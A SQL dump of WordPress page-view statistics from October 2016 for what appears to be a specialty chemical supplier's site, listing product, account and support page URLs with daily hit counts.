INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a2/', '2016-10-26', 1, 1010); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a2/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1010); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a1/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1009); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a3/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1011); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a7/', '2016-10-26', 1, 1016); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a5/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1012); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a6/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1015); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a7/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1016); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/', '2016-10-26', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-26', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-26', 18, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-26', 3, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-26', 3, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/110xn/', '2016-10-26', 1, 1662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-110xnb/', '2016-10-26', 1, 1664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-110xnb/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/110xn/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a0/', '2016-10-26', 1, 992); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-26', 3, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/heloxy-71/', '2016-10-26', 1, 1231); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/heloxy-71/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1231); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-26', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/', '2016-10-26', 1, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-26', 4, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-26', 8, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-26', 3, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds', '2016-10-26', 3, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-26', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204', '2016-10-26', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-26', 2, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-26', 3, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions', '2016-10-26', 3, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?add_to_wishlist=575', '2016-10-26', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?add_to_wishlist=568', '2016-10-26', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-26', 7, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2322', '2016-10-26', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-26', 5, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-26', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-26', 6, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/?wc-ajax=get_refreshed_fragments', '2016-10-26', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-26', 5, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-26', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-26', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/', '2016-10-26', 2, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-26', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/?wc-ajax=get_refreshed_fragments', '2016-10-26', 2, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-26', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-26', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-26', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-26', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-26', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/ms-111/', '2016-10-26', 1, 1153); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/ms-111/', '2016-10-26', 1, 1153); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/ms-111/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1153); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-26', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-sdg/', '2016-10-26', 1, 1268); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-10-26', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-26', 3, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-8900-semi-permanent-mold-release/', '2016-10-26', 1, 1449); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-8800-semi-permanent-mold-release/', '2016-10-26', 1, 1448); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl-low-global-warming-release-agent/', '2016-10-26', 3, 2763); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/releasys-89/', '2016-10-26', 1, 340); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122avl-low-global-warming-mold-release/', '2016-10-26', 2, 2769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122sel/', '2016-10-26', 1, 2771); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/', '2016-10-26', 1, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-smt/', '2016-10-26', 1, 2226); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-10-26', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-26', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-26', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-26', 2, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-26', 2, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-26', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-26', 2, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-26', 2, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/', '2016-10-26', 1, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/?wc-ajax=get_refreshed_fragments', '2016-10-26', 1, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-27', 116, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-27', 404, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-27', 70, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-27', 6, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-27', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-27', 36, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-27', 6, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-27', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-27', 2, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-27', 17, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-27', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-27', 10, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-27', 7, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-27', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-27', 22, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-27', 4, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-27', 3, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-27', 52, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-27', 2, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-27', 6, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-27', 4, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-27', 62, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-27', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-27', 4, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-27', 4, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-27', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-27', 11, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-27', 12, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-27', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-27', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-27', 5, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-27', 7, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-27', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-27', 5, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/heloxy-68/', '2016-10-27', 1, 1226); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/', '2016-10-27', 4, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-27', 3, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-10-27', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-27', 5, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-27', 4, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/', '2016-10-27', 1, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-agl-683/', '2016-10-27', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-agl-683/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a1/', '2016-10-27', 1, 993); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a7/', '2016-10-27', 1, 1016); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-27', 3, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-27', 4, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-27', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-27', 2, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/', '2016-10-27', 2, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-27', 5, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-27', 13, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-27', 1, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-212/', '2016-10-27', 1, 819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-27', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-27', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-27', 7, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-27', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-27', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-27', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-220/', '2016-10-27', 1, 410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-220/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 410); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-27', 13, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-27', 14, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-27', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-27', 3, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/', '2016-10-27', 5, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/', '2016-10-27', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lubrication-overview/', '2016-10-27', 1, 2058); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lubrication-overview/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 2058); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-27', 15, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-27', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/', '2016-10-27', 2, 1224); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1224); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-27', 2, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-27', 4, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-27', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-27', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-27', 4, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-27', 4, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-27', 3, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-143az/', '2016-10-27', 1, 452); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-27', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-222l/', '2016-10-27', 1, 2782); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/', '2016-10-27', 2, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-27', 7, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon/', '2016-10-27', 1, 490); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-ultra/', '2016-10-27', 2, 2788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-27', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3030/', '2016-10-27', 1, 1164); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-27', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3046/', '2016-10-27', 1, 1166); 
INSERT INTO `wp_statistics_pages` VALUES ('/index.php', '2016-10-27', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/', '2016-10-27', 1, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-antistatic-ultra/', '2016-10-27', 1, 2795); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-27', 2, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ad/', '2016-10-27', 1, 656); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-27', 2, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-27', 2, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-10-27', 2, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-27', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-730l-contact-re-nu/', '2016-10-27', 2, 2800); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-730l-contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 2800); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l-flux-remover/', '2016-10-27', 2, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l-flux-remover/?wc-ajax=get_refreshed_fragments', '2016-10-27', 1, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-27', 1, 672); 
